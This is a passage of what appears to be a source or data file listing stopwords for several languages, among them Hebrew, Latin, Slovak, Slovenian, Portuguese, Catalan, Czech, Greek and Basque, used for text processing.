\"היא\",\n        \"היה\",\n        \"היכן\",\n        \"היתה\",\n        \"היתי\",\n        \"הם\",\n        \"הן\",\n        \"הנה\",\n        \"הסיבהשבגללה\",\n        \"הרי\",\n        \"ואילו\",\n        \"ואת\",\n        \"זאת\",\n        \"זה\",\n        \"זות\",\n        \"יהיה\",\n        \"יוכל\",\n        \"יוכלו\",\n        \"יותרמדי\",\n        \"יכול\",\n        \"יכולה\",\n        \"יכולות\",\n        \"יכולים\",\n        \"יכל\",\n        \"יכלה\",\n        \"יכלו\",\n        \"יש\",\n        \"כאן\",\n        \"כאשר\",\n        \"כולם\",\n        \"כולן\",\n        \"כזה\",\n        \"כי\",\n        \"כיצד\",\n        \"כך\",\n        \"ככה\",\n        \"כל\",\n        \"כלל\",\n        \"כמו\",\n        \"כן\",\n        \"כפי\",\n        \"כש\",\n        \"לא\",\n        \"לאו\",\n        \"לאיזותכלית\",\n        \"לאן\",\n        \"לבין\",\n        \"לה\",\n        \"להיות\",\n        \"להם\",\n        \"להן\",\n        \"לו\",\n        \"לי\",\n        \"לכם\",\n        \"לכן\",\n        \"למה\",\n        \"למטה\",\n        \"למעלה\",\n        \"למקוםשבו\",\n        \"למרות\",\n        \"לנו\",\n        \"לעבר\",\n        \"לעיכן\",\n        \"לפיכך\",\n        \"לפני\",\n        \"מאד\",\n        \"מאחורי\",\n        \"מאיזוסיבה\",\n        \"מאין\",\n        \"מאיפה\",\n        \"מבלי\",\n        \"מבעד\",\n        \"מדוע\",\n        \"מה\",\n        \"מהיכן\",\n        \"מול\",\n        \"מחוץ\",\n        \"מי\",\n        \"מכאן\",\n        \"מכיוון\",\n        \"מלבד\",\n        \"מן\",\n        \"מנין\",\n        \"מסוגל\",\n        \"מעט\",\n        \"מעטים\",\n        \"מעל\",\n        \"מצד\",\n        \"מקוםבו\",\n        \"מתחת\",\n        \"מתי\",\n        \"נגד\",\n        \"נגר\",\n        \"נו\",\n        \"עד\",\n        \"עז\",\n        \"על\",\n        \"עלי\",\n        \"עליה\",\n        \"עליהם\",\n        \"עליהן\",\n        \"עליו\",\n        \"עליך\",\n        \"עליכם\",\n        \"עלינו\",\n        \"עם\",\n        
\"עצמה\",\n        \"עצמהם\",\n        \"עצמהן\",\n        \"עצמו\",\n        \"עצמי\",\n        \"עצמם\",\n        \"עצמן\",\n        \"עצמנו\",\n        \"פה\",\n        \"רק\",\n        \"שוב\",\n        \"של\",\n        \"שלה\",\n        \"שלהם\",\n        \"שלהן\",\n        \"שלו\",\n        \"שלי\",\n        \"שלך\",\n        \"שלכה\",\n        \"שלכם\",\n        \"שלכן\",\n        \"שלנו\",\n        \"שם\",\n        \"תהיה\",\n        \"תחת\",\n    ],\n    \"la\": [\n        \"a\",\n        \"ab\",\n        \"ac\",\n        \"ad\",\n        \"at\",\n        \"atque\",\n        \"aut\",\n        \"autem\",\n        \"cum\",\n        \"de\",\n        \"dum\",\n        \"e\",\n        \"erant\",\n        \"erat\",\n        \"est\",\n        \"et\",\n        \"etiam\",\n        \"ex\",\n        \"haec\",\n        \"hic\",\n        \"hoc\",\n        \"in\",\n        \"ita\",\n        \"me\",\n        \"nec\",\n        \"neque\",\n        \"non\",\n        \"per\",\n        \"qua\",\n        \"quae\",\n        \"quam\",\n        \"qui\",\n        \"quibus\",\n        \"quidem\",\n        \"quo\",\n        \"quod\",\n        \"re\",\n        \"rebus\",\n        \"rem\",\n        \"res\",\n        \"sed\",\n        \"si\",\n        \"sic\",\n        \"sunt\",\n        \"tamen\",\n        \"tandem\",\n        \"te\",\n        \"ut\",\n        \"vel\",\n    ],\n    \"sk\": [\n        \"a\",\n        \"aby\",\n        \"aj\",\n        \"ako\",\n        \"aký\",\n        \"ale\",\n        \"alebo\",\n        \"ani\",\n        \"avšak\",\n        \"ba\",\n        \"bez\",\n        \"buď\",\n        \"cez\",\n        \"do\",\n        \"ho\",\n        \"hoci\",\n        \"i\",\n        \"ich\",\n        \"im\",\n        \"ja\",\n        \"jeho\",\n        \"jej\",\n        \"jemu\",\n        \"ju\",\n        \"k\",\n        \"kam\",\n        \"kde\",\n        \"keďže\",\n        \"keď\",\n        \"kto\",\n        \"ktorý\",\n        \"ku\",\n        \"lebo\",\n        
\"ma\",\n        \"mi\",\n        \"mne\",\n        \"mnou\",\n        \"mu\",\n        \"my\",\n        \"mňa\",\n        \"môj\",\n        \"na\",\n        \"nad\",\n        \"nami\",\n        \"neho\",\n        \"nej\",\n        \"nemu\",\n        \"nich\",\n        \"nielen\",\n        \"nim\",\n        \"no\",\n        \"nám\",\n        \"nás\",\n        \"náš\",\n        \"ním\",\n        \"o\",\n        \"od\",\n        \"on\",\n        \"ona\",\n        \"oni\",\n        \"ono\",\n        \"ony\",\n        \"po\",\n        \"pod\",\n        \"pre\",\n        \"pred\",\n        \"pri\",\n        \"s\",\n        \"sa\",\n        \"seba\",\n        \"sem\",\n        \"so\",\n        \"svoj\",\n        \"taký\",\n        \"tam\",\n        \"teba\",\n        \"tebe\",\n        \"tebou\",\n        \"tej\",\n        \"ten\",\n        \"ti\",\n        \"tie\",\n        \"to\",\n        \"toho\",\n        \"tomu\",\n        \"tou\",\n        \"tvoj\",\n        \"ty\",\n        \"tá\",\n        \"tým\",\n        \"v\",\n        \"vami\",\n        \"veď\",\n        \"vo\",\n        \"vy\",\n        \"vám\",\n        \"vás\",\n        \"váš\",\n        \"však\",\n        \"z\",\n        \"za\",\n        \"zo\",\n        \"a\",\n        \"či\",\n        \"čo\",\n        \"čí\",\n        \"ňom\",\n        \"ňou\",\n        \"ňu\",\n        \"že\",\n    ],\n    \"sl\": [\n        \"a\",\n        \"ali\",\n        \"april\",\n        \"avgust\",\n        \"b\",\n        \"bi\",\n        \"bil\",\n        \"bila\",\n        \"bile\",\n        \"bili\",\n        \"bilo\",\n        \"biti\",\n        \"blizu\",\n        \"bo\",\n        \"bodo\",\n        \"bojo\",\n        \"bolj\",\n        \"bom\",\n        \"bomo\",\n        \"boste\",\n        \"bova\",\n        \"boš\",\n        \"brez\",\n        \"c\",\n        \"cel\",\n        \"cela\",\n        \"celi\",\n        \"celo\",\n        \"d\",\n        \"da\",\n        \"daleč\",\n        \"dan\",\n        \"danes\",\n 
       \"datum\",\n        \"december\",\n        \"deset\",\n        \"deseta\",\n        \"deseti\",\n        \"deseto\",\n        \"devet\",\n        \"deveta\",\n        \"deveti\",\n        \"deveto\",\n        \"do\",\n        \"dober\",\n        \"dobra\",\n        \"dobri\",\n        \"dobro\",\n        \"dokler\",\n        \"dol\",\n        \"dolg\",\n        \"dolga\",\n        \"dolgi\",\n        \"dovolj\",\n        \"drug\",\n        \"druga\",\n        \"drugi\",\n        \"drugo\",\n        \"dva\",\n        \"dve\",\n        \"e\",\n        \"eden\",\n        \"en\",\n        \"ena\",\n        \"ene\",\n        \"eni\",\n        \"enkrat\",\n        \"eno\",\n        \"etc.\",\n        \"f\",\n        \"februar\",\n        \"g\",\n        \"g.\",\n        \"ga\",\n        \"ga.\",\n        \"gor\",\n        \"gospa\",\n        \"gospod\",\n        \"h\",\n        \"halo\",\n        \"i\",\n        \"idr.\",\n        \"ii\",\n        \"iii\",\n        \"in\",\n        \"iv\",\n        \"ix\",\n        \"iz\",\n        \"j\",\n        \"januar\",\n        \"jaz\",\n        \"je\",\n        \"ji\",\n        \"jih\",\n        \"jim\",\n        \"jo\",\n        \"julij\",\n        \"junij\",\n        \"jutri\",\n        \"k\",\n        \"kadarkoli\",\n        \"kaj\",\n        \"kajti\",\n        \"kako\",\n        \"kakor\",\n        \"kamor\",\n        \"kamorkoli\",\n        \"kar\",\n        \"karkoli\",\n        \"katerikoli\",\n        \"kdaj\",\n        \"kdo\",\n        \"kdorkoli\",\n        \"ker\",\n        \"ki\",\n        \"kje\",\n        \"kjer\",\n        \"kjerkoli\",\n        \"ko\",\n        \"koder\",\n        \"koderkoli\",\n        \"koga\",\n        \"komu\",\n        \"kot\",\n        \"kratek\",\n        \"kratka\",\n        \"kratke\",\n        \"kratki\",\n        \"l\",\n        \"lahka\",\n        \"lahke\",\n        \"lahki\",\n        \"lahko\",\n        \"le\",\n        \"lep\",\n        \"lepa\",\n        \"lepe\",\n      
  \"lepi\",\n        \"lepo\",\n        \"leto\",\n        \"m\",\n        \"maj\",\n        \"majhen\",\n        \"majhna\",\n        \"majhni\",\n        \"malce\",\n        \"malo\",\n        \"manj\",\n        \"marec\",\n        \"me\",\n        \"med\",\n        \"medtem\",\n        \"mene\",\n        \"mesec\",\n        \"mi\",\n        \"midva\",\n        \"midve\",\n        \"mnogo\",\n        \"moj\",\n        \"moja\",\n        \"moje\",\n        \"mora\",\n        \"morajo\",\n        \"moram\",\n        \"moramo\",\n        \"morate\",\n        \"moraš\",\n        \"morem\",\n        \"mu\",\n        \"n\",\n        \"na\",\n        \"nad\",\n        \"naj\",\n        \"najina\",\n        \"najino\",\n        \"najmanj\",\n        \"naju\",\n        \"največ\",\n        \"nam\",\n        \"narobe\",\n        \"nas\",\n        \"nato\",\n        \"nazaj\",\n        \"naš\",\n        \"naša\",\n        \"naše\",\n        \"ne\",\n        \"nedavno\",\n        \"nedelja\",\n        \"nek\",\n        \"neka\",\n        \"nekaj\",\n        \"nekatere\",\n        \"nekateri\",\n        \"nekatero\",\n        \"nekdo\",\n        \"neke\",\n        \"nekega\",\n        \"neki\",\n        \"nekje\",\n        \"neko\",\n        \"nekoga\",\n        \"nekoč\",\n        \"ni\",\n        \"nikamor\",\n        \"nikdar\",\n        \"nikjer\",\n        \"nikoli\",\n        \"nič\",\n        \"nje\",\n        \"njega\",\n        \"njegov\",\n        \"njegova\",\n        \"njegovo\",\n        \"njej\",\n        \"njemu\",\n        \"njen\",\n        \"njena\",\n        \"njeno\",\n        \"nji\",\n        \"njih\",\n        \"njihov\",\n        \"njihova\",\n        \"njihovo\",\n        \"njiju\",\n        \"njim\",\n        \"njo\",\n        \"njun\",\n        \"njuna\",\n        \"njuno\",\n        \"no\",\n        \"nocoj\",\n        \"november\",\n        \"npr.\",\n        \"o\",\n        \"ob\",\n        \"oba\",\n        \"obe\",\n        \"oboje\",\n        
\"od\",\n        \"odprt\",\n        \"odprta\",\n        \"odprti\",\n        \"okoli\",\n        \"oktober\",\n        \"on\",\n        \"onadva\",\n        \"one\",\n        \"oni\",\n        \"onidve\",\n        \"osem\",\n        \"osma\",\n        \"osmi\",\n        \"osmo\",\n        \"oz.\",\n        \"p\",\n        \"pa\",\n        \"pet\",\n        \"peta\",\n        \"petek\",\n        \"peti\",\n        \"peto\",\n        \"po\",\n        \"pod\",\n        \"pogosto\",\n        \"poleg\",\n        \"poln\",\n        \"polna\",\n        \"polni\",\n        \"polno\",\n        \"ponavadi\",\n        \"ponedeljek\",\n        \"ponovno\",\n        \"potem\",\n        \"povsod\",\n        \"pozdravljen\",\n        \"pozdravljeni\",\n        \"prav\",\n        \"prava\",\n        \"prave\",\n        \"pravi\",\n        \"pravo\",\n        \"prazen\",\n        \"prazna\",\n        \"prazno\",\n        \"prbl.\",\n        \"precej\",\n        \"pred\",\n        \"prej\",\n        \"preko\",\n        \"pri\",\n        \"pribl.\",\n        \"približno\",\n        \"primer\",\n        \"pripravljen\",\n        \"pripravljena\",\n        \"pripravljeni\",\n        \"proti\",\n        \"prva\",\n        \"prvi\",\n        \"prvo\",\n        \"r\",\n        \"ravno\",\n        \"redko\",\n        \"res\",\n        \"reč\",\n        \"s\",\n        \"saj\",\n        \"sam\",\n        \"sama\",\n        \"same\",\n        \"sami\",\n        \"samo\",\n        \"se\",\n        \"sebe\",\n        \"sebi\",\n        \"sedaj\",\n        \"sedem\",\n        \"sedma\",\n        \"sedmi\",\n        \"sedmo\",\n        \"sem\",\n        \"september\",\n        \"seveda\",\n        \"si\",\n        \"sicer\",\n        \"skoraj\",\n        \"skozi\",\n        \"slab\",\n        \"smo\",\n        \"so\",\n        \"sobota\",\n        \"spet\",\n        \"sreda\",\n        \"srednja\",\n        \"srednji\",\n        \"sta\",\n        \"ste\",\n        \"stran\",\n        
\"stvar\",\n        \"sva\",\n        \"t\",\n        \"ta\",\n        \"tak\",\n        \"taka\",\n        \"take\",\n        \"taki\",\n        \"tako\",\n        \"takoj\",\n        \"tam\",\n        \"te\",\n        \"tebe\",\n        \"tebi\",\n        \"tega\",\n        \"težak\",\n        \"težka\",\n        \"težki\",\n        \"težko\",\n        \"ti\",\n        \"tista\",\n        \"tiste\",\n        \"tisti\",\n        \"tisto\",\n        \"tj.\",\n        \"tja\",\n        \"to\",\n        \"toda\",\n        \"torek\",\n        \"tretja\",\n        \"tretje\",\n        \"tretji\",\n        \"tri\",\n        \"tu\",\n        \"tudi\",\n        \"tukaj\",\n        \"tvoj\",\n        \"tvoja\",\n        \"tvoje\",\n        \"u\",\n        \"v\",\n        \"vaju\",\n        \"vam\",\n        \"vas\",\n        \"vaš\",\n        \"vaša\",\n        \"vaše\",\n        \"ve\",\n        \"vedno\",\n        \"velik\",\n        \"velika\",\n        \"veliki\",\n        \"veliko\",\n        \"vendar\",\n        \"ves\",\n        \"več\",\n        \"vi\",\n        \"vidva\",\n        \"vii\",\n        \"viii\",\n        \"visok\",\n        \"visoka\",\n        \"visoke\",\n        \"visoki\",\n        \"vsa\",\n        \"vsaj\",\n        \"vsak\",\n        \"vsaka\",\n        \"vsakdo\",\n        \"vsake\",\n        \"vsaki\",\n        \"vsakomur\",\n        \"vse\",\n        \"vsega\",\n        \"vsi\",\n        \"vso\",\n        \"včasih\",\n        \"včeraj\",\n        \"x\",\n        \"z\",\n        \"za\",\n        \"zadaj\",\n        \"zadnji\",\n        \"zakaj\",\n        \"zaprta\",\n        \"zaprti\",\n        \"zaprto\",\n        \"zdaj\",\n        \"zelo\",\n        \"zunaj\",\n        \"č\",\n        \"če\",\n        \"često\",\n        \"četrta\",\n        \"četrtek\",\n        \"četrti\",\n        \"četrto\",\n        \"čez\",\n        \"čigav\",\n        \"š\",\n        \"šest\",\n        \"šesta\",\n        \"šesti\",\n        \"šesto\",\n        
\"štiri\",\n        \"ž\",\n        \"že\",\n    ],\n    \"br\": [\n        \"a\",\n        \"ainda\",\n        \"alem\",\n        \"ambas\",\n        \"ambos\",\n        \"antes\",\n        \"ao\",\n        \"aonde\",\n        \"aos\",\n        \"apos\",\n        \"aquele\",\n        \"aqueles\",\n        \"as\",\n        \"assim\",\n        \"com\",\n        \"como\",\n        \"contra\",\n        \"contudo\",\n        \"cuja\",\n        \"cujas\",\n        \"cujo\",\n        \"cujos\",\n        \"da\",\n        \"das\",\n        \"de\",\n        \"dela\",\n        \"dele\",\n        \"deles\",\n        \"demais\",\n        \"depois\",\n        \"desde\",\n        \"desta\",\n        \"deste\",\n        \"dispoe\",\n        \"dispoem\",\n        \"diversa\",\n        \"diversas\",\n        \"diversos\",\n        \"do\",\n        \"dos\",\n        \"durante\",\n        \"e\",\n        \"ela\",\n        \"elas\",\n        \"ele\",\n        \"eles\",\n        \"em\",\n        \"entao\",\n        \"entre\",\n        \"essa\",\n        \"essas\",\n        \"esse\",\n        \"esses\",\n        \"esta\",\n        \"estas\",\n        \"este\",\n        \"estes\",\n        \"ha\",\n        \"isso\",\n        \"isto\",\n        \"logo\",\n        \"mais\",\n        \"mas\",\n        \"mediante\",\n        \"menos\",\n        \"mesma\",\n        \"mesmas\",\n        \"mesmo\",\n        \"mesmos\",\n        \"na\",\n        \"nao\",\n        \"nas\",\n        \"nem\",\n        \"nesse\",\n        \"neste\",\n        \"nos\",\n        \"o\",\n        \"os\",\n        \"ou\",\n        \"outra\",\n        \"outras\",\n        \"outro\",\n        \"outros\",\n        \"pelas\",\n        \"pelo\",\n        \"pelos\",\n        \"perante\",\n        \"pois\",\n        \"por\",\n        \"porque\",\n        \"portanto\",\n        \"propios\",\n        \"proprio\",\n        \"quais\",\n        \"qual\",\n        \"qualquer\",\n        \"quando\",\n        \"quanto\",\n        
\"que\",\n        \"quem\",\n        \"quer\",\n        \"se\",\n        \"seja\",\n        \"sem\",\n        \"sendo\",\n        \"seu\",\n        \"seus\",\n        \"sob\",\n        \"sobre\",\n        \"sua\",\n        \"suas\",\n        \"tal\",\n        \"tambem\",\n        \"teu\",\n        \"teus\",\n        \"toda\",\n        \"todas\",\n        \"todo\",\n        \"todos\",\n        \"tua\",\n        \"tuas\",\n        \"tudo\",\n        \"um\",\n        \"uma\",\n        \"umas\",\n        \"uns\",\n    ],\n    \"ca\": [\n        \"a\",\n        \"abans\",\n        \"ací\",\n        \"ah\",\n        \"així\",\n        \"això\",\n        \"al\",\n        \"aleshores\",\n        \"algun\",\n        \"alguna\",\n        \"algunes\",\n        \"alguns\",\n        \"alhora\",\n        \"allà\",\n        \"allí\",\n        \"allò\",\n        \"als\",\n        \"altra\",\n        \"altre\",\n        \"altres\",\n        \"amb\",\n        \"ambdues\",\n        \"ambdós\",\n        \"apa\",\n        \"aquell\",\n        \"aquella\",\n        \"aquelles\",\n        \"aquells\",\n        \"aquest\",\n        \"aquesta\",\n        \"aquestes\",\n        \"aquests\",\n        \"aquí\",\n        \"baix\",\n        \"cada\",\n        \"cadascuna\",\n        \"cadascunes\",\n        \"cadascuns\",\n        \"cadascú\",\n        \"com\",\n        \"contra\",\n        \"d'un\",\n        \"d'una\",\n        \"d'unes\",\n        \"d'uns\",\n        \"dalt\",\n        \"de\",\n        \"del\",\n        \"dels\",\n        \"des\",\n        \"després\",\n        \"dins\",\n        \"dintre\",\n        \"donat\",\n        \"doncs\",\n        \"durant\",\n        \"e\",\n        \"eh\",\n        \"el\",\n        \"els\",\n        \"em\",\n        \"en\",\n        \"encara\",\n        \"ens\",\n        \"entre\",\n        \"eren\",\n        \"es\",\n        \"esta\",\n        \"estaven\",\n        \"esteu\",\n        \"està\",\n        \"estàvem\",\n        \"estàveu\",\n        
\"et\",\n        \"etc\",\n        \"ets\",\n        \"fins\",\n        \"fora\",\n        \"gairebé\",\n        \"ha\",\n        \"han\",\n        \"has\",\n        \"havia\",\n        \"he\",\n        \"hem\",\n        \"heu\",\n        \"hi\",\n        \"ho\",\n        \"i\",\n        \"igual\",\n        \"iguals\",\n        \"ja\",\n        \"l'hi\",\n        \"la\",\n        \"les\",\n        \"li\",\n        \"li'n\",\n        \"llavors\",\n        \"m'he\",\n        \"ma\",\n        \"mal\",\n        \"malgrat\",\n        \"mateix\",\n        \"mateixa\",\n        \"mateixes\",\n        \"mateixos\",\n        \"me\",\n        \"mentre\",\n        \"meu\",\n        \"meus\",\n        \"meva\",\n        \"meves\",\n        \"molt\",\n        \"molta\",\n        \"moltes\",\n        \"molts\",\n        \"mon\",\n        \"mons\",\n        \"més\",\n        \"n'he\",\n        \"n'hi\",\n        \"ne\",\n        \"ni\",\n        \"no\",\n        \"nogensmenys\",\n        \"només\",\n        \"nosaltres\",\n        \"nostra\",\n        \"nostre\",\n        \"nostres\",\n        \"o\",\n        \"oh\",\n        \"oi\",\n        \"on\",\n        \"pas\",\n        \"pel\",\n        \"pels\",\n        \"per\",\n        \"perquè\",\n        \"però\",\n        \"poc\",\n        \"poca\",\n        \"pocs\",\n        \"poques\",\n        \"potser\",\n        \"propi\",\n        \"qual\",\n        \"quals\",\n        \"quan\",\n        \"quant\",\n        \"que\",\n        \"quelcom\",\n        \"qui\",\n        \"quin\",\n        \"quina\",\n        \"quines\",\n        \"quins\",\n        \"què\",\n        \"s'ha\",\n        \"s'han\",\n        \"sa\",\n        \"semblant\",\n        \"semblants\",\n        \"ses\",\n        \"seu\",\n        \"seus\",\n        \"seva\",\n        \"seves\",\n        \"si\",\n        \"sobre\",\n        \"sobretot\",\n        \"solament\",\n        \"sols\",\n        \"son\",\n        \"sons\",\n        \"sota\",\n        \"sou\",\n       
 \"sóc\",\n        \"són\",\n        \"t'ha\",\n        \"t'han\",\n        \"t'he\",\n        \"ta\",\n        \"tal\",\n        \"també\",\n        \"tampoc\",\n        \"tan\",\n        \"tant\",\n        \"tanta\",\n        \"tantes\",\n        \"teu\",\n        \"teus\",\n        \"teva\",\n        \"teves\",\n        \"ton\",\n        \"tons\",\n        \"tot\",\n        \"tota\",\n        \"totes\",\n        \"tots\",\n        \"un\",\n        \"una\",\n        \"unes\",\n        \"uns\",\n        \"us\",\n        \"va\",\n        \"vaig\",\n        \"vam\",\n        \"van\",\n        \"vas\",\n        \"veu\",\n        \"vosaltres\",\n        \"vostra\",\n        \"vostre\",\n        \"vostres\",\n        \"érem\",\n        \"éreu\",\n        \"és\",\n    ],\n    \"cs\": [\n        \"a\",\n        \"aby\",\n        \"ahoj\",\n        \"aj\",\n        \"ale\",\n        \"anebo\",\n        \"ani\",\n        \"ano\",\n        \"asi\",\n        \"aspoň\",\n        \"atd\",\n        \"atp\",\n        \"ačkoli\",\n        \"až\",\n        \"bez\",\n        \"beze\",\n        \"blízko\",\n        \"bohužel\",\n        \"brzo\",\n        \"bude\",\n        \"budem\",\n        \"budeme\",\n        \"budete\",\n        \"budeš\",\n        \"budou\",\n        \"budu\",\n        \"by\",\n        \"byl\",\n        \"byla\",\n        \"byli\",\n        \"bylo\",\n        \"byly\",\n        \"bys\",\n        \"být\",\n        \"během\",\n        \"chce\",\n        \"chceme\",\n        \"chcete\",\n        \"chceš\",\n        \"chci\",\n        \"chtít\",\n        \"chtějí\",\n        \"chut'\",\n        \"chuti\",\n        \"co\",\n        \"což\",\n        \"cz\",\n        \"daleko\",\n        \"další\",\n        \"den\",\n        \"deset\",\n        \"devatenáct\",\n        \"devět\",\n        \"dnes\",\n        \"do\",\n        \"dobrý\",\n        \"docela\",\n        \"dva\",\n        \"dvacet\",\n        \"dvanáct\",\n        \"dvě\",\n        \"dál\",\n        
\"dále\",\n        \"děkovat\",\n        \"děkujeme\",\n        \"děkuji\",\n        \"ho\",\n        \"hodně\",\n        \"i\",\n        \"jak\",\n        \"jakmile\",\n        \"jako\",\n        \"jakož\",\n        \"jde\",\n        \"je\",\n        \"jeden\",\n        \"jedenáct\",\n        \"jedna\",\n        \"jedno\",\n        \"jednou\",\n        \"jedou\",\n        \"jeho\",\n        \"jehož\",\n        \"jej\",\n        \"jejich\",\n        \"její\",\n        \"jelikož\",\n        \"jemu\",\n        \"jen\",\n        \"jenom\",\n        \"jestli\",\n        \"jestliže\",\n        \"ještě\",\n        \"jež\",\n        \"ji\",\n        \"jich\",\n        \"jimi\",\n        \"jinak\",\n        \"jiné\",\n        \"již\",\n        \"jsem\",\n        \"jseš\",\n        \"jsi\",\n        \"jsme\",\n        \"jsou\",\n        \"jste\",\n        \"já\",\n        \"jí\",\n        \"jím\",\n        \"jíž\",\n        \"k\",\n        \"kam\",\n        \"kde\",\n        \"kdo\",\n        \"kdy\",\n        \"když\",\n        \"ke\",\n        \"kolik\",\n        \"kromě\",\n        \"kterou\",\n        \"která\",\n        \"které\",\n        \"který\",\n        \"kteří\",\n        \"kvůli\",\n        \"mají\",\n        \"mezi\",\n        \"mi\",\n        \"mne\",\n        \"mnou\",\n        \"mně\",\n        \"moc\",\n        \"mohl\",\n        \"mohou\",\n        \"moje\",\n        \"moji\",\n        \"možná\",\n        \"musí\",\n        \"my\",\n        \"má\",\n        \"málo\",\n        \"mám\",\n        \"máme\",\n        \"máte\",\n        \"máš\",\n        \"mé\",\n        \"mí\",\n        \"mít\",\n        \"mě\",\n        \"můj\",\n        \"může\",\n        \"na\",\n        \"nad\",\n        \"nade\",\n        \"napište\",\n        \"naproti\",\n        \"načež\",\n        \"naše\",\n        \"naši\",\n        \"ne\",\n        \"nebo\",\n        \"nebyl\",\n        \"nebyla\",\n        \"nebyli\",\n        \"nebyly\",\n        \"nedělají\",\n        
\"nedělá\",\n        \"nedělám\",\n        \"neděláme\",\n        \"neděláte\",\n        \"neděláš\",\n        \"neg\",\n        \"nejsi\",\n        \"nejsou\",\n        \"nemají\",\n        \"nemáme\",\n        \"nemáte\",\n        \"neměl\",\n        \"není\",\n        \"nestačí\",\n        \"nevadí\",\n        \"než\",\n        \"nic\",\n        \"nich\",\n        \"nimi\",\n        \"nové\",\n        \"nový\",\n        \"nula\",\n        \"nám\",\n        \"námi\",\n        \"nás\",\n        \"náš\",\n        \"ním\",\n        \"ně\",\n        \"něco\",\n        \"nějak\",\n        \"někde\",\n        \"někdo\",\n        \"němu\",\n        \"němuž\",\n        \"o\",\n        \"od\",\n        \"ode\",\n        \"on\",\n        \"ona\",\n        \"oni\",\n        \"ono\",\n        \"ony\",\n        \"osm\",\n        \"osmnáct\",\n        \"pak\",\n        \"patnáct\",\n        \"po\",\n        \"pod\",\n        \"podle\",\n        \"pokud\",\n        \"potom\",\n        \"pouze\",\n        \"pozdě\",\n        \"pořád\",\n        \"pravé\",\n        \"pro\",\n        \"prostě\",\n        \"prosím\",\n        \"proti\",\n        \"proto\",\n        \"protože\",\n        \"proč\",\n        \"první\",\n        \"pta\",\n        \"pět\",\n        \"před\",\n        \"přes\",\n        \"přese\",\n        \"při\",\n        \"přičemž\",\n        \"re\",\n        \"rovně\",\n        \"s\",\n        \"se\",\n        \"sedm\",\n        \"sedmnáct\",\n        \"si\",\n        \"skoro\",\n        \"smí\",\n        \"smějí\",\n        \"snad\",\n        \"spolu\",\n        \"sta\",\n        \"sto\",\n        \"strana\",\n        \"sté\",\n        \"své\",\n        \"svých\",\n        \"svým\",\n        \"svými\",\n        \"ta\",\n        \"tady\",\n        \"tak\",\n        \"takhle\",\n        \"taky\",\n        \"také\",\n        \"takže\",\n        \"tam\",\n        \"tamhle\",\n        \"tamhleto\",\n        \"tamto\",\n        \"tato\",\n        \"tebe\",\n        
\"tebou\",\n        \"ted'\",\n        \"tedy\",\n        \"ten\",\n        \"tento\",\n        \"teto\",\n        \"ti\",\n        \"tipy\",\n        \"tisíc\",\n        \"tisíce\",\n        \"to\",\n        \"tobě\",\n        \"tohle\",\n        \"toho\",\n        \"tohoto\",\n        \"tom\",\n        \"tomto\",\n        \"tomu\",\n        \"tomuto\",\n        \"toto\",\n        \"trošku\",\n        \"tu\",\n        \"tuto\",\n        \"tvoje\",\n        \"tvá\",\n        \"tvé\",\n        \"tvůj\",\n        \"ty\",\n        \"tyto\",\n        \"téma\",\n        \"tím\",\n        \"tímto\",\n        \"tě\",\n        \"těm\",\n        \"těmu\",\n        \"třeba\",\n        \"tři\",\n        \"třináct\",\n        \"u\",\n        \"určitě\",\n        \"už\",\n        \"v\",\n        \"vaše\",\n        \"vaši\",\n        \"ve\",\n        \"vedle\",\n        \"večer\",\n        \"vlastně\",\n        \"vy\",\n        \"vám\",\n        \"vámi\",\n        \"vás\",\n        \"váš\",\n        \"více\",\n        \"však\",\n        \"všechno\",\n        \"všichni\",\n        \"vůbec\",\n        \"vždy\",\n        \"z\",\n        \"za\",\n        \"zatímco\",\n        \"zač\",\n        \"zda\",\n        \"zde\",\n        \"ze\",\n        \"zprávy\",\n        \"zpět\",\n        \"čau\",\n        \"či\",\n        \"článku\",\n        \"články\",\n        \"čtrnáct\",\n        \"čtyři\",\n        \"šest\",\n        \"šestnáct\",\n        \"že\",\n    ],\n    \"el\": [\n        \"αλλα\",\n        \"αν\",\n        \"αντι\",\n        \"απο\",\n        \"αυτα\",\n        \"αυτεσ\",\n        \"αυτη\",\n        \"αυτο\",\n        \"αυτοι\",\n        \"αυτοσ\",\n        \"αυτουσ\",\n        \"αυτων\",\n        \"για\",\n        \"δε\",\n        \"δεν\",\n        \"εαν\",\n        \"ειμαι\",\n        \"ειμαστε\",\n        \"ειναι\",\n        \"εισαι\",\n        \"ειστε\",\n        \"εκεινα\",\n        \"εκεινεσ\",\n        \"εκεινη\",\n        \"εκεινο\",\n        \"εκεινοι\",\n        
\"εκεινοσ\",\n        \"εκεινουσ\",\n        \"εκεινων\",\n        \"ενω\",\n        \"επι\",\n        \"η\",\n        \"θα\",\n        \"ισωσ\",\n        \"κ\",\n        \"και\",\n        \"κατα\",\n        \"κι\",\n        \"μα\",\n        \"με\",\n        \"μετα\",\n        \"μη\",\n        \"μην\",\n        \"να\",\n        \"ο\",\n        \"οι\",\n        \"ομωσ\",\n        \"οπωσ\",\n        \"οσο\",\n        \"οτι\",\n        \"παρα\",\n        \"ποια\",\n        \"ποιεσ\",\n        \"ποιο\",\n        \"ποιοι\",\n        \"ποιοσ\",\n        \"ποιουσ\",\n        \"ποιων\",\n        \"που\",\n        \"προσ\",\n        \"πωσ\",\n        \"σε\",\n        \"στη\",\n        \"στην\",\n        \"στο\",\n        \"στον\",\n        \"τα\",\n        \"την\",\n        \"τησ\",\n        \"το\",\n        \"τον\",\n        \"τοτε\",\n        \"του\",\n        \"των\",\n        \"ωσ\",\n    ],\n    \"eu\": [\n        \"al\",\n        \"anitz\",\n        \"arabera\",\n        \"asko\",\n        \"baina\",\n        \"bat\",\n        \"batean\",\n        \"batek\",\n        \"bati\",\n        \"batzuei\",\n        \"batzuek\",\n        \"batzuetan\",\n        \"batzuk\",\n        \"bera\",\n        \"beraiek\",\n        \"berau\",\n        \"berauek\",\n        \"bere\",\n        \"berori\",\n        \"beroriek\",\n        \"beste\",\n        \"bezala\",\n        \"da\",\n        \"dago\",\n        \"dira\",\n        \"ditu\",\n        \"du\",\n        \"dute\",\n        \"edo\",\n        \"egin\",\n        \"ere\",\n        \"eta\",\n        \"eurak\",\n        \"ez\",\n        \"gainera\",\n        \"gu\",\n        \"gutxi\",\n        \"guzti\",\n        \"haiei\",\n        \"haiek\",\n        \"haietan\",\n        \"hainbeste\",\n        \"hala\",\n        \"han\",\n        \"handik\",\n        \"hango\",\n        \"hara\",\n        \"hari\",\n        \"hark\",\n        \"hartan\",\n        \"hau\",\n        \"hauei\",\n        \"hauek\",\n        \"hauetan\",\n        
